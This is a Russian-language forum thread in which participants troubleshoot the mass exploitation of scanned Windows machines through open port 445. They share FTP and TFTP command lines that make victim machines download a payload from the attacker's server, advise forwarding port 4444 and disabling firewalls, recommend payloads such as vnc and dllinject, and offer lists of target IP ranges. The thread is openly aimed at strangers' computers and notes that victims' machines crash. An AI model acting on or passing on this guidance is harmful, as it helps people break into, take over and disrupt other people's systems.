всё работает из сотни насканеных компов штук 20 с открытым портом 445 из этих 20 штук 15 уязвимы. НО при попытке соединения по ftp всё застревает на проверке имени пользователя сначала думал что остальное не отображается пробовал вводить пароль и дальше команды но скачка не идёт. что делать в этом случае? может использовать другой пэйлоад?

Так по поводу ftp , я уже писал , что фтп я настроил под anonymous без пароля , подошёл только такой способ , с паролями происходит висяк , тем боле на фиг нужен пароль , если всё равно фтп на дедике поднимать :



Такое было когда был юзабельным LSA сплойт , в данном случае , из 20 компов на 3 если повезёт 5 можно поймать шелл

дак когда anonymous всеравно требует мэйл в качестве пароля.
проверил нащёт Triggering the vulnerability у жертвы в это время выскакивает сообщение об ошибке с запросом отправить отчёт об ошибке после чего комп жоска виснет.

отлично работает ! Спасибки вам! :*

tftp в этих случаях может помочь, можешь взять здесь , если стоишь за натом открывай порт 66, в cmd пишешь , -этот способ более удобный. У кого останаливается trigerring vulnerability.. сделайте порт форвардинг на 4444 порт(если вы стоите за НАТ), вырубите все фаеры у себя. Начинки **/http (через 80 порт), vnc, dllinject более реальные используйте их.

Открываешь cmd и пишешь одной строчкой ftp -n xxx.xxx.xxx.xxx . ххх- айпи твоего фтп.

Так, нашел хороший диапазон, для тех кто хочет проверить свои силы. Кидаю в ПМ. Просить тоже в ПМ)

наконец нашёл способ! ftp -A ip сервера буква нужна большая потому что -a и -A это разные ключи.

Хех...большая буква и маленькая буква - разные. Всегда помните, а то люди иногда зря ругаются на глючность программы, перепутав регистр букв ;D